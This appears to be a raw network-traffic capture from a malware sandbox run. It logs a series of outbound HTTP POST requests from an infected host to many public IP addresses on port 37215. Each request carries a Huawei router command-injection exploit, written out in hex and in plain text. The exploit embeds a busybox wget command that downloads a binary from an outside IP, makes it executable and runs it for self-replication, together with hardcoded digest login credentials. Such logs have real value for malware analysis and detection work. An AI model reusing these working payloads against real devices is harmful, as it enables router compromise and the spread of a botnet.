                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1276192.168.2.233964641.89.47.18737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328512907 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1277192.168.2.234347241.252.219.12137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328535080 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1278192.168.2.234969441.51.212.3037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328551054 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1279192.168.2.2337386157.156.33.13137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328557968 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1280192.168.2.2352828157.14.216.12737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328576088 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1281192.168.2.2351242149.150.49.6237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328598022 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1282192.168.2.235138074.123.176.5637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328613997 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1283192.168.2.234427825.159.59.10837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328633070 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1284192.168.2.235681041.153.95.1437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328635931 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1285192.168.2.2355926157.151.126.15837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328649044 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1286192.168.2.234996841.198.47.2937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328671932 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
